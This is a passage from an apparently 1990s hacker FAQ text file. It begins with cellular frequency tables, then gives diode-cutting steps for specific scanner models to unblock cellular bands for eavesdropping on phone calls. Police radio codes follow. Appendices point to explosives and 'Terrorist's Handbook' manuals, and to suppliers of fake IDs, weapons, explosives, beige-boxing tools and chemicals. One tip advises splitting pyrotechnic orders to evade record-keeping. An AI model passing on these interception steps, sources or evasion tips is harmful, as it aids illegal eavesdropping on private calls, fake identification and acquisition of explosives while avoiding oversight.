835.980 836.010 836.040 3 383 384 385 386 387 388 389 881.490 881.520 881.550 881.580 881.610 881.640 881.670 836.490 836.520 836.550 836.580 836.610 836.640 836.670 4 404 405 406 407 408 409 410 882.120 882.150 882.180 882.210 882.240 882.270 882.300 837.120 837.150 837.180 837.210 837.240 837.270 837.300 5 425 426 427 428 429 430 431 882.750 882.780 882.810 882.840 882.870 882.900 882.930 837.750 837.780 837.810 837.840 837.870 837.900 837.930 6 446 447 448 449 450 451 452 883.380 883.410 883.440 883.470 883.500 883.530 883.560 838.380 838.410 838.440 838.470 838.500 838.530 838.560 7 467 468 469 470 471 472 473 884.010 884.040 884.070 884.100 884.130 884.160 884.190 839.010 839.040 839.070 839.100 839.130 839.160 839.190 8 488 489 490 491 492 493 494 884.640 884.670 884.700 884.730 884.760 884.790 884.820 839.640 839.670 839.700 839.730 839.760 839.790 839.820 9 509 510 511 512 513 514 515 885.270 885.300 885.330 885.360 885.390 885.420 885.450 840.270 840.300 840.330 840.360 840.390 840.420 840.450 10 530 531 532 533 534 535 536 885.900 885.930 885.960 885.990 886.020 886.050 886.080 840.900 840.930 840.960 840.990 841.020 841.050 841.080 11 551 552 553 554 555 556 557 886.530 886.560 886.590 886.620 886.650 886.680 886.710 841.530 841.560 841.590 841.620 841.650 841.680 841.710 12 572 573 574 575 576 577 578 887.160 887.190 887.220 887.250 887.280 887.310 887.340 842.160 842.190 842.220 842.250 842.280 842.310 842.340 13 593 594 595 596 597 598 599 887.790 887.820 887.850 887.880 887.910 887.940 887.970 842.790 842.820 842.850 842.880 842.910 842.940 842.970 14 614 615 616 617 618 619 620 888.420 888.450 888.480 888.510 888.540 888.570 888.600 843.420 843.450 843.480 843.510 843.540 843.570 843.600 15 635 636 637 638 639 640 641 889.050 889.080 889.110 889.140 889.170 889.200 889.230 844.050 844.080 844.110 844.140 844.170 844.200 844.230 16 656 657 658 659 660 661 662 889.680 889.710 889.740 889.770 889.800 889.830 889.860 844.680 844.710 844.740 844.770 844.800 844.830 844.860 Cell # Chan 15 16 17 18 19 20 21 1 348 349 350 351 352 353 354 880.440 880.470 880.500 880.530 880.560 880.590 880.620 835.440 835.470 835.500 835.530 835.560 835.590 835.620 2 369 370 371 372 373 374 375 881.070 881.100 881.130 881.160 881.190 881.220 881.250 836.070 836.100 836.130 836.160 836.190 836.220 836.250 3 390 391 392 393 394 395 396 881.700 881.730 881.760 881.790 881.820 881.850 881.880 836.700 836.730 836.760 836.790 836.820 836.850 836.880 4 411 412 413 414 415 416 417 882.330 882.360 882.390 882.420 882.450 882.480 882.510 837.330 837.360 837.390 837.420 837.450 837.480 837.510 5 432 433 434 435 436 437 438 882.960 882.990 883.020 883.050 883.080 883.110 883.140 837.960 837.990 838.020 838.050 838.080 838.110 838.140 6 453 454 455 456 457 458 459 883.590 883.620 883.650 883.680 883.710 883.740 883.770 838.590 838.620 838.650 838.680 838.710 838.740 838.770 7 474 475 476 477 478 479 480 884.220 884.250 884.280 884.310 884.340 884.370 884.400 839.220 839.250 839.280 839.310 839.340 839.370 839.400 8 495 496 497 498 499 500 501 884.850 884.880 884.910 884.940 884.970 885.000 885.030 839.850 839.880 839.910 839.940 839.970 840.000 840.030 9 516 517 518 519 520 521 522 885.480 885.510 885.540 885.570 885.600 885.630 885.660 840.480 840.510 840.540 840.570 840.600 840.630 840.660 10 537 538 539 540 541 542 543 886.110 886.140 886.170 886.200 886.230 886.260 886.290 841.110 841.140 841.170 841.200 841.230 841.260 841.290 11 558 559 560 561 562 563 564 886.740 886.770 886.800 886.830 886.860 886.890 886.920 841.740 841.770 841.800 841.830 841.860 841.890 841.920 12 579 580 581 582 583 584 585 887.370 887.400 887.430 887.460 887.490 887.520 887.550 842.370 842.400 842.430 842.460 842.490 842.520 842.550 13 600 601 602 603 604 605 606 888.000 888.030 888.060 888.090 888.120 888.150 888.180 843.000 843.030 843.060 843.090 843.120 843.150 843.180 14 621 622 623 624 625 626 627 888.630 888.660 888.690 888.720 888.750 888.780 888.810 843.630 843.660 843.690 843.720 843.750 843.780 843.810 15 642 643 644 645 646 647 648 889.260 889.290 889.320 889.350 889.380 889.410 889.440 844.260 844.290 844.320 844.350 844.380 844.410 844.440 16 663 664 665 666 889.890 889.920 889.950 889.980 844.890 844.920 844.950 844.980 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR? 1. Buy an older scanner before they stopped them from receiving the necessary freqs (look at garage sales) 2. For a Realistic PRO-2004 open the case and cut one leg of D-513. 3. For a Realistic PRO-2005 open the case and cut one leg of D-502. 4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz and 869-896 MHz. 5. Get the "Scanner Modification Handbook" volumes I and II by Bill Cheek from Comunications Electronics Inc. (313)996-8888. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC? There are books available at Radio Shack for about $8 that list all of the freqs used by area. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN? 10-00 Series Code 10-0 Exercise great caution. 10-1 Reception is poor. 10-2 Reception is good. 10-3 Stop transmitting. 10-4 Message received. 10-5 Relay message. 10-6 Change channel. 10-7 Out of service/unavailable for assignment. 10-7A Out of service at home. 10-7B Out of service - personal. 10-7OD Out of service - off duty 10-8 In service/available for assignment. 10-9 Repeat last transmission. 10-10 Off duty. 10-10A Off duty at home. 10-11 Identify this frequency. 10-12 Visitors are present (be discrete). 10-13 Advise weather and road conditions. 10-14 Citizen holding suspect. 10-15 Prisoner in custody. 10-16 Pick up prisoner. 10-17 Request for gasoline. 10-18 Equipment exchange. 10-19 Return/returning to the station. 10-20 Location? 10-21 Telephone:______ 10-21A Advise home that I will return at ______. 10-21B Phone your home 10-21R Phone radio dispatch 10-22 Disregard the last assignment. 10-22C Leave area if all secure; responsible person/owner is enroute. 10-23 Standby. 10-24 Request car-to-car transmission. 10-25 Do you have contact with _______? 10-26 Clear. 10-27 Driver's license check. 10-28 Vehicle registration request. 10-29 Check wants/warrants.[vehicle] (PIN,SVS) 10-29a Check wants/warrants [subject] (PIN) 10-29c Check complete [subject] 10-29f The subject is wanted for a felony. 10-29h Caution - severe hazard potential. 10-29r Check wants/record [subject (PIN,CJIC) 10-29m The subject is wanted for a misdemeanor. 10-29v The vehicle is wanted in connection with a possible crime. 10-30 Does not conform to regulations. 10-32 Drowning. 10-33 Alarm sounding. 10-34 Assist at office. 10-35 Time check. 10-36 Confidential information. 10-37 Identify the operator. 10-39 Can ______ come to the radio? 10-40 Is ______ available for a telephone call? 10-42 Check on the welfare of/at ______. 10-43 Call a doctor. 10-45 What is the condition of the patient? 10-45A Condition of patient is good. 10-45B Condition of patient is serious. 10-45C Condition of patient is critical. 10-45D Patient is deceased. 10-46 Sick person [amb. enroute] 10-48 Ambulance transfer call 10-49 Proceed to/Enroute to ______. 10-50 Subject is under the influence of narcotics./Take a report. 10-51 Subject is drunk. 10-52 Resuscitator is needed. 10-53 Person down. 10-54 Possible dead body. 10-55 This is a coroner's case. 10-56 Suicide. 10-56A Suicide attempt. 10-57 Firearm discharged. 10-58 Garbage complaint 10-59 Security check./Malicious mischief 10-60 Lock out. 10-61 Miscellaneous public service. 10-62 Meet a citizen. 10-62A Take a report from a citizen. 10-62B Civil standby. 10-63 Prepare to copy. 10-64 Found property. 10-65 Missing person 10-66 Suspicious person. 10-67 Person calling for help. 10-68 Call for police made via telephone. 10-70 Prowler. 10-71 Shooting. 10-72 Knifing. 10-73 How do you receive? 10-79 Bomb threat. 10-80 Explosion. 10-86 Any traffic? 10-87 Meet the officer at ______. 10-88 Fill with the officer/Assume your post. 10-91 Animal. 10-91a Stray. 10-91b Noisy animal. 10-91c Injured animal. 10-91d Dead animal. 10-91e Animal bite. 10-91g Animal pickup. 10-91h Stray horse 10-91j Pickup/collect ______. 10-91L Leash law violation. 10-91V Vicious animal. 10-95 Out of vehicle-pedestrian/ Requesting an I.D./Tech unit. 10-96 Out of vehicle-ped. send backup 10-97 Arrived at the scene. 10-98 Available for assignment. 10-99 Open police garage door 10-100 Civil disturbance - Mutual aid standby. 10-101 Civil disturbance - Mutual aid request. 11-00 Series Code 11-10 Take a report. 11-24 Abandoned automobile. 11-25 Traffic hazard. 11-26 Abandoned bicycle. 11-27 10-27 with the driver being held. 11-28 10-28 with the driver being held. 11-40 Advise if an ambulance is needed. 11-41 An ambulance is needed. 11-42 No ambulance is needed. 11-48 Furnish transportation. 11-51 Escort. 11-52 Funeral detail. 11-54 Suspicious vehicle. 11-55 Officer is being followed by automobile. 11-56 Officer is being followed by auto containing dangerous persons. 11-57 An unidentified auto appeared at the scene of the assignment. 11-58 Radio traffic is being monitored. Phone all non-routine messages. 11-59 Give intensive attention to high hazard/business areas. 11-60 Attack in a high hazard area. 11-65 Signal light is out. 11-66 Defective traffic light. 11-78 Aircraft accident. 11-79 Accident - ambulance has been sent. 11-80 Accident - major injuries. 11-81 Accident - minor injuries. 11-82 Accident - no injuries. 11-83 Accident - no details. 11-84 Direct traffic. 11-85 Tow truck required. 11-94 Pedestrian stop. 11-95 Routine traffic stop. 11-96 Checking a suspicious vehicle. 11-97 Time/security check on patrol vehicles. 11-98 Meet: _______ 11-99 Officer needs help. 900 Series Codes 904 Fire. 904A Automobile fire. 904B Building fire. 904G Grass fire. 909 Traffic problem; police needed. 910 Can handle this detail. 932 Turn on _______ mobile relay at _______. 933 Turn off mobile relay. 949 Burning inspection at _______. 950 Control burn in progress/about to begin/ended. 951 Need fire investigator. 952 Report on conditions. 953 Investigate smoke. 953A Investigate gas. 954 Off the air at the scene of the fire. 955 Fire is under control. 956 Assignment not finished. 957 Delayed response of __ minutes. 980 Restrict calls to emergency only. 981 Resume normal traffic. 1000 Plane crash 3000 Road block Other Codes Code 1 Do so at your convenience. Code 2 Urgent. Code 3 Emergency/lights and siren. Code 4 No further assistance is needed. Code 5 Stakeout. Code 6 Responding from a long distance. Code 7 Mealtime. Code 8 Request cover/backup. Code 9 Set up a roadblock. Code 10 Bomb threat Code 12 Notify news media Code 20 Officer needs assistance Code 22 Restricted radio traffic Code 30 Officer needs HELP - EMERGENCY! Code 33 Mobile emergency - clear this radio channel. Code 43 TAC forces committed. AID Public Safety Assistance Phonetic Alphabet A Adam N Nora B Boy O Ocean C Charles P Paul D David Q Queen E Edward R Robert F Frank S Sam G George T Tom H Henry U Union I Ida V Victor J John W William K King X X-ray L Lincoln Y Yellow M Mary Z Zebra ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION? Vehicles Item Example 1. Color Red over black 2. Year 1984 3. Make Cadillac 4. Body Two door 5. License plate 6VWH926 (given phonetically!) Persons 1. Name 2. Race 3. Sex 4. Age 5. Height 6. Weight 7. Hair color 8. Eye color 9. Complexion 10. Physical marks, tattoos, scars, limps, etc. 11. Clothing (head to feet) a. Hat b. Shirt;tie c. Coat d. Trousers e. Socks f. Shoes ===================================================================== Appendix A. FTP sites with useful info: ftp.eff.org wiretap.spies.com hpacv.com (mail postmaster@hpacv.com for info first) phred.pc.cc.cmu.edu quartz.rutgers.edu uglymouse.css.itd.umich.edu grind.isca.uiowa.edu zero.cypher.com cpsr.org /cpsr cert.sei.cmu.edu plains.nodak.edu etext.archive.umich.edu ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/ black.ox.ac.uk Dictionaries ftp.win.tue.nl world.std.com clr.nmsu.edu glis.cr.usgs.gov \ These two sites will give you martini.eecs.umich.edu 3000 / whatever info you need about any city. ===================================================================== Apendix B. Interesting gophers: gopher.eff.org 5070 gopher.wired.com techno.stanford.edu phred.pc.cc.cmu.edu ===================================================================== Appendix C. Informative USENET Newsgroups alt.tcom alt.forgery alt.cyberpunk alt.2600 alt.hackers (need to hack into this one) alt.security alt.security.pgp alt.unix.wizards misc.security sci.computer.security sci.crypt sci.electronics rec.pyrotechnics sci.chem alt.locksmith comp.virus comp.unix.admin comp.protocols.tcp-ip Also try IRC #hack. *** WARNING: May be lame at times!!! *** ===================================================================== Appendix D. Publications and Zines ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 2600:The Hacker Quarterly a technical journal put out by hackers mail: email: 2600 2600@well.sf.ca.us PO Box 752 emmanuel@well.sf.ca.us Middle Island, NY 11953 PH:516-751-2600 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ PHRACK The electronic journal of hackers and phreakers. Email: phrack@well.sf.ca.us ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WIRED The magazine of the cyberculture. Email: subscription@wired.com info@wired.com Or look for it on many newsstands. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Fringe Ware Review Email: fringeware@io.com ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Iron Feather Journal Mail: IFJ PO Box 1905 Boulder CO 80306 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Groom Lake Desert Rat Email: psychospy@aol.com ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Cybertek: The Cyberpunk Technical Journal Mail: Cybertek PO Box 64 Brewster NY 10509 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ LineNoiz Email: dodger@fubar.bk.psu.edu with 'subscription linenoiz ' in the body of the message ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ For more info on Zines then check out Factsheet Five and Factsheet Five Electronic. email: jerod23@well.sf.ca.us ===================================================================== Appendix E. Books APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well worth it to anyone into crypto. Davis, Tenney L.: "Chemistry of Powder and Explosives." Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press) Russell: "Computer Security Basics" Cornwall: "The (New) Hacker's Handbook" "Cyberpunk" (forget the authors) Kochan & Wood: "UNIX System Security" Spafford & Garfinkel: " Practical UNIX Security" Stohl, Clifford: "The Cuckoo's Egg" Gasser, Morrie: "Building a Secure Computer System THE RAINBOW SERIES Can be obtained free from: INFOSEC Awareness Office National Computer Security Centre 9800 Savage Road Fort George G. Meade, MD 20755-6000 Tel: 1-301-766-8729 "The Improvised Munitions Manual" ===================================================================== Appendix F. Files and Papers. Morris & Thompson: "Password Security, A Case History" Curry: "Improving the Security of your UNIX System" available via FTP as 'security-doc.tar.Z' Klein: "Foiling the Cracker: A Survey of, and Improvements to, Password Security." Archie search for 'Foiling' Cheswick: "The Design of a Secure Internet Gateway" available from research.att.com /dist/Secure_Internet_Gateway.ps Cheswick: "An Evening with Berford: in which a Cracker is Lured, Endured and Studied" available from research.att.com /dist/berford.ps Bellovin89: "Security Problems in the TCP/IP Protocol Suite" available from research.att.com /dist/ipext.ps.Z Bellovin91: "Limitations of the Kerberos Authentication System" available from research.att.com CERT: many various bits of info collected at cert.sei.cmu.edu "Open Systems Security" available from ajk.tele.fi(131.177.5.20) /PublicDocuments RFC-1244: "The Site Security Handbook" "The Terrorist's Handbook" how to make various explosive, propellants and ignitors and also how to apply and use them ===================================================================== Appendix G. Catalogs ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Lockpicks (from Belisarius) You can get lockpicks from: American Systems 2100 Roswell Road Suite 200C-223 Marietta, GA 30062 Lock Pick Sets ============== Novice ($32.50): 11 pix, tension wrenches and a broken key extractor. Pouch. Deluxe ($54.60): 16 pix, wrenches, extractor. Pocket size leather case. Superior ($79.80): 32 pix, wrenches,extractor. Hand finished leather case. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Explosives and other underground stuff Loompanics is one of the major distributors of material relating to the underground including explosives. You can get the catalog by mailing: Loompanics Unlim P.O. Box 1197 Port Townsend, Wash 98368 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Fake IDs, Technical Manuals on almost anything (from CyberSorceror) NIC/LAW ENFORCEMENT SUPPLY 500 Flournoy Lucas Road/Building #3 Post Office Box 5950 Shreveport, LA 71135-5950 Phone: (318) 688-1365 FAX: (318) 688-1367 NIC offers ids of ALL types just about, as well as how-to manuals on EVERYTHING, posters, lock stuff, electronic surveillance stuff. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Weapons, explosives, survival gear. (from CyberSorceror) Phoenix Systems, INC. P.O. Box 3339 Evergreen, CO 80439 (303) 277-0305 Phoenix offers explosives, grenade launchers, incendiaries, tear gas grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000 volts, ballistic knives and maces(battering), armored personnel carriers, saps/batons, booby traps, envelope clearing chemicals .. turns envelopes transparent until it dries and leaves no marks (used by postal service and FBI), survival stuff, radiation pills, gasoline stabilizers for long term storage, emergency supplies, etc, more how-to books on more illegal stuff than you'd ever have time to read. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Paladin Press PO Box 1307 Boulder, CO 80306 Enclose $2 for the publishers of the "Action Library". Books on lockpicking, wiretapping, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ US Cavalry Catalog Army field manuals, etc. Interesting hardware, just about any military equipment (no firearms) Their Customer Service Number is as follows: 1-800-333-5102 Their Hours are: 9am-9pm, Monday-Friday ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ For beige boxing, data com cracking/patching tools try: TIME MOTION TOOLS 12778 BROOKPRINTER PLACE POWAY, CA 92064-6810 (619) 679-0303 (800) 779-8170 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Chemicals and lab equipment!! Only requires SIGNATURE for proof of age! (from Neurophyre) Hagenow Laboratories, Inc. 1302 Washington St. Manitowoc, WI 54220 Send a crisp $1 bill and a request for a catalog. Tip: Don't order all your pyro stuff from here. They DO keep records. Be safe. ===================================================================== Appendix H. PGP keys None available currently ... ===================================================================== ********************************************************************* ************************ END OF THE HACK-FAQ! *********************** ********************************************************************* ***** Therefore, determine the enemy's plans and you will know ****** ***** which strategy will be successful and which will not. ****** ***** -- Sun Tzu, The Art of War ****** ********************************************************************* *********************************************************************